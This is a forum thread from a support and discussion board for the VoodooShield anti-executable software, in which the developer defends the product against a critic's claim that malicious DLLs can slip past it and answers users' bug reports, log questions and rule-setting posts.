Author Topic: VoodooShield v4 STABLE Thread  (Read 141486 times)

Offline Shmu26

  • Jr. Member
  • **
  • Posts: 55
    • View Profile
Re: VoodooShield v4 STABLE Thread
« Reply #1110 on: November 15, 2018, 07:58:28 pm »
Voodooshield is very diligent at monitoring the various command lines that could load dll files by other means. Nevertheless, reflexive dll loading is one of the dirtiest tricks in the industry, it's tough to fight. Just my 2 cents. Let's hear what Dan says. :)

Offline VoodooShield

  • VoodooShield Developer
  • VoodooShield Support
  • Sr. Member
  • *
  • Posts: 456
    • View Profile
    • VoodooShield
Re: VoodooShield v4 STABLE Thread
« Reply #1111 on: November 16, 2018, 03:39:40 am »
We have discussed this topic to death several times in recent years, and I am not going to waste a lot of time on this, so I will be very clear, blunt and to the point.

This topic was recently raised again when Umbra made the following uniformed and ignorant statement...

"Note that some are dlls, good luck to stop that if you use a simple anti-exe."

https://malwaretips.com/threads/the-pentagon-has-started-uploading-malware-samples-from-apts-nation-states.87924/post-776140

The reality is, there are two ways (that I know of) to test malicious dll's... simply copying files to the desktop and executing them is not going to cut it for this test ;).  Instead, you can either take the time to learn the Metaploit framework and perform the appropriate tests, or you can learn how to code custom malware.  The last time I had a similar discussion with Umbra and his cohorts, they admitted that they were not familiar with Metasploit and try as they might, were unable to perform the tests.  As for coding custom malware for tests???  It is probably safe to assume that their coding experience started and ended with a Hello World demo.

On the other hand, I have performed Metasploit tests and have written a few lines of code in my time, and I have not been able to bypass VS.  Early on, there were occasions when I was able to bypass dev versions of VS, but that is exactly how you harden your code.

Umbra is also aware that when a youtuber by the name of Black Cipher was bypassing pretty much every product on the market, including Umbra's favorite products... here is what he had to say about VS (in yellow at the bottom)...

www.voodooshield.com/artwork/BlackCipher.PNG

It is a shame that Black Cipher took his youtube channel down... it inadvertently demonstrated VS's robust protection capabilities.  I still have backups of the important ones though ;).  There have been several other people who have performed similar tests, and each time VS blocks the attack.

Anyway, it turns out that it is extremely difficult to bypass VS.  I guess if you think about it, it kind of makes sense...  No other dev or company has spent 7 years of 60-80 hours a week dedicated to refining their product and making it user-friendly for the masses.

I am certainly not suggesting that VS is absolutely bulletproof, but the only evidence that anyone has are tests where VS blocks the attack.

If Umbra is going to make these wild speculations, then someone needs to hold his feet to the fire and have him post the evidence.

I have handed Umbra's ass to him in the past, and I am willing to do it again.

But to answer your question "is there is a chance that another exe may import/launch the malicious dll?".  Sure, there is a chance.  There is also a chance that I will win the lottery (okay, to be fair, the odds are not quite that minute).  But until I am holding the winning ticket, or until someone produces evidence that demonstrates a bypass, it is probably best to bet on the product that time after time demonstrates how difficult it is to bypass, where others fail.

I have said time and time again that I am certain that there is something that can bypass VS, and many people have tried.  Someone will bypass it at some point, I just am not betting on Umbra unless he becomes familiar with the Metasploit framework or learns how to code.




Offline VoodooShield

  • VoodooShield Developer
  • VoodooShield Support
  • Sr. Member
  • *
  • Posts: 456
    • View Profile
    • VoodooShield
Re: VoodooShield v4 STABLE Thread
« Reply #1112 on: November 16, 2018, 03:44:10 am »
Voodooshield is very diligent at monitoring the various command lines that could load dll files by other means. Nevertheless, reflexive dll loading is one of the dirtiest tricks in the industry, it's tough to fight. Just my 2 cents. Let's hear what Dan says. :)
Reflective dll injections were probably one of the first things people tried.  At some point, you are going to hit a road block.

People used to speculate constantly instead of test.  One can speculate all day long, but until you run the tests, you will simply never know.  What happens is they start to run the tests, then they encounter road blocks.

Here is some great info on reflective dll injections.

Offline ssherjj

  • Global Moderator
  • Full Member
  • *****
  • Posts: 130
    • View Profile
Re: VoodooShield v4 STABLE Thread
« Reply #1113 on: November 16, 2018, 03:58:04 am »
Thank you Dan! Your last 2 posts were very exciting/encouraging/ inspiring for me to read. You're a man of true passion in his work. I'm proud to be able to test and run your bullet proof program! I can't learn enough..i

May I ask why my VS disappears and then it'll come back sometimes quickly or I have to restart it. I suppose I should do a clean install of VS...

Thanks!
Microsoft® Windows Insider MVP - Windows Security 
Webroot® SecureAnywhere™ Expert Product Advisor Webroot Forum Gold VIP  (Beta Tester)
VoodooShields  v4.69

Offline VoodooShield

  • VoodooShield Developer
  • VoodooShield Support
  • Sr. Member
  • *
  • Posts: 456
    • View Profile
    • VoodooShield
Re: VoodooShield v4 STABLE Thread
« Reply #1114 on: November 16, 2018, 04:13:23 am »
Hi Dan just noticing if I set to Disable/Install mode and upon reboot it goes back to Smart mode and before it use to stay in Disable/Install mode until I change it back to Smart Mode. v4.65

TIA,

Daniel
Hey TH... please download the latest version from our website.  It should be fixed, but if not, please let me know, thank you!

https://voodooshield.com/Download/InstallVoodooShield465.exe

It's the same file and same hash. Maybe time for a clean reinstall?
I know this sounds odd... but what you might try is to change to a different mode, like maybe Always ON, then back to Smart (or whatever), then see if it works.  There is a variable known as "PreviousMode" that might be stuck on Disabled.  If that does not work please let me know and I will figure out why this is happening.  Thank you!

Offline VoodooShield

  • VoodooShield Developer
  • VoodooShield Support
  • Sr. Member
  • *
  • Posts: 456
    • View Profile
    • VoodooShield
Re: VoodooShield v4 STABLE Thread
« Reply #1115 on: November 16, 2018, 04:15:51 am »
Thank you Dan! Your last 2 posts were very exciting/encouraging/ inspiring for me to read. You're a man of true passion in his work. I'm proud to be able to test and run your bullet proof program! I can't learn enough..i

May I ask why my VS disappears and then it'll come back sometimes quickly or I have to restart it. I suppose I should do a clean install of VS...

Thanks!
Thank you ssherjj, I appreciate that!  Can you please send me your DeveloperLog.log (support at voodooshield.com)?

Sometimes it is a good idea to uninstall VS, have it delete the Settings and logs, then reboot and reinstall... especially if you have been using VS for several years and have not done so.  Especially if you installed a lot of beta versions along the way ;).  Thank you!

Offline ssherjj

  • Global Moderator
  • Full Member
  • *****
  • Posts: 130
    • View Profile
Re: VoodooShield v4 STABLE Thread
« Reply #1116 on: November 16, 2018, 04:38:17 am »
Thank you Dan! Your last 2 posts were very exciting/encouraging/ inspiring for me to read. You're a man of true passion in his work. I'm proud to be able to test and run your bullet proof program! I can't learn enough..i

May I ask why my VS disappears and then it'll come back sometimes quickly or I have to restart it. I suppose I should do a clean install of VS...

Thanks!
Thank you ssherjj, I appreciate that!  Can you please send me your DeveloperLog.log (support at voodooshield.com)?

Sometimes it is a good idea to uninstall VS, have it delete the Settings and logs, then reboot and reinstall... especially if you have been using VS for several years and have not done so.  Especially if you installed a lot of beta versions along the way ;).  Thank you!

Dan it has been awhile since I have sent logs. Are you wanting todays DevelopersLog.log? Let me know if you did not get my logs that I sent. beta
« Last Edit: November 16, 2018, 05:23:10 am by ssherjj »
Microsoft® Windows Insider MVP - Windows Security 
Webroot® SecureAnywhere™ Expert Product Advisor Webroot Forum Gold VIP  (Beta Tester)
VoodooShields  v4.69

Offline CyberGhosT

  • Youngling
  • *
  • Posts: 10
  • Ummmm ... No :)
    • View Profile
Re: VoodooShield v4 STABLE Thread
« Reply #1117 on: November 16, 2018, 05:44:13 am »
Hey Dan, great reading, glad things are going smooth, Stay Frosty  8)
Imma message you this weekend. PeAcE

Offline Shmu26

  • Jr. Member
  • **
  • Posts: 55
    • View Profile
Re: VoodooShield v4 STABLE Thread
« Reply #1118 on: November 16, 2018, 05:49:48 am »
Hey Dan, great reading, glad things are going smooth, Stay Frosty  8)
Imma message you this weekend. PeAcE
Hi Ghostie, always a pleasure when you make an appearance. I believe in ghosts! :)

Offline VoodooShield

  • VoodooShield Developer
  • VoodooShield Support
  • Sr. Member
  • *
  • Posts: 456
    • View Profile
    • VoodooShield
Re: VoodooShield v4 STABLE Thread
« Reply #1119 on: November 16, 2018, 05:58:13 am »
Thank you Dan! Your last 2 posts were very exciting/encouraging/ inspiring for me to read. You're a man of true passion in his work. I'm proud to be able to test and run your bullet proof program! I can't learn enough..i

May I ask why my VS disappears and then it'll come back sometimes quickly or I have to restart it. I suppose I should do a clean install of VS...

Thanks!
Thank you ssherjj, I appreciate that!  Can you please send me your DeveloperLog.log (support at voodooshield.com)?

Sometimes it is a good idea to uninstall VS, have it delete the Settings and logs, then reboot and reinstall... especially if you have been using VS for several years and have not done so.  Especially if you installed a lot of beta versions along the way ;).  Thank you!

Dan it has been awhile since I have sent logs. Are you wanting todays DevelopersLog.log? Let me know if you did not get my logs that I sent. beta
Thank you, I got your logs and emailed you.  I did not see any bugs except the google.com one from the internet check.  Anyway, the rest of the info is in the email, thank you!

Offline VoodooShield

  • VoodooShield Developer
  • VoodooShield Support
  • Sr. Member
  • *
  • Posts: 456
    • View Profile
    • VoodooShield
Re: VoodooShield v4 STABLE Thread
« Reply #1120 on: November 16, 2018, 05:58:55 am »
Hey Dan, great reading, glad things are going smooth, Stay Frosty  8)
Imma message you this weekend. PeAcE
Hey CG, how are you?  Very cool, talk to you soon, have a great weekend!

Online oldschool

  • Jr. Member
  • **
  • Posts: 69
    • View Profile
Re: VoodooShield v4 STABLE Thread
« Reply #1121 on: November 16, 2018, 05:59:31 am »
Dan - thanks for the explanation. No need to defend VS, as it's track record speaks for itself. I'll believe the critics when I see VS users showing up on forums asking for help with malware infections. Until then the critics can keep screaming "fanboy", etc. VS works for me and I don't need to be a geek to use it!  8)
"... still trying to find the answers to life's persistent questions..." - Guy Noir, Private Eye

W10 1809 Windows Defender + VoodooShield Pro

Offline VoodooShield

  • VoodooShield Developer
  • VoodooShield Support
  • Sr. Member
  • *
  • Posts: 456
    • View Profile
    • VoodooShield
Re: VoodooShield v4 STABLE Thread
« Reply #1122 on: November 16, 2018, 06:00:22 am »
It was little confusing trying to create an ideal rule for home use.

Actually the rules are very useful on workstations.  This is my rule-set.  Do this rule for each account on the box.



The same rule-set also locks down %Program Data%, as nothing should ever execute from that folder.  You will need to disable the rule-set for many installs.  Unfortunately, too many software sellers want to use your LUA %.\Low\Temp% for installs, and this also happens if you (cleverly) use Admin.  But at least you can stop cold any malware that wants to install itself on your box--it just won't happen and you won't even feel the bump in the road!  Software should install from wherever you put it, usually the desktop or your software archive.  I'm thinking of shutting down the Desktop as well, but I have too many legit maintenance apps there, I'll have to let VS interrogate those.

Seem to be folder specific rule targeting process execution, especially during installition.  Going to give a try for a week.  Hope it don't nag to much.
Very cool, please let me know how it goes!

Offline simmerskool

  • Jr. Member
  • **
  • Posts: 65
    • View Profile
Re: VoodooShield v4 STABLE Thread
« Reply #1123 on: November 16, 2018, 06:11:04 am »
Dan, thanks for the great explanations!

Getting back to @Mx's original question: VS would handle a dll attack like the one described not by scanning the dll in Ai, but rather by blocking the processes that try to load the dll. Correct?

my bad, sorry!  :-[

Offline simmerskool

  • Jr. Member
  • **
  • Posts: 65
    • View Profile
Re: VoodooShield v4 STABLE Thread
« Reply #1124 on: November 16, 2018, 06:19:27 am »
Hi Dan just noticing if I set to Disable/Install mode and upon reboot it goes back to Smart mode and before it use to stay in Disable/Install mode until I change it back to Smart Mode. v4.65

TIA,

Daniel
Hey TH... please download the latest version from our website.  It should be fixed, but if not, please let me know, thank you!

https://voodooshield.com/Download/InstallVoodooShield465.exe

ALERT! I tried the link from chrome which is currently running the malwarebytes browser extension, and guess what? MB totally blocked the link, could not bypass (unless of course I disabled MB ext -- happy to do that!) claiming "bad reputation" or some such bs.  How low is that for MB.  Geezz.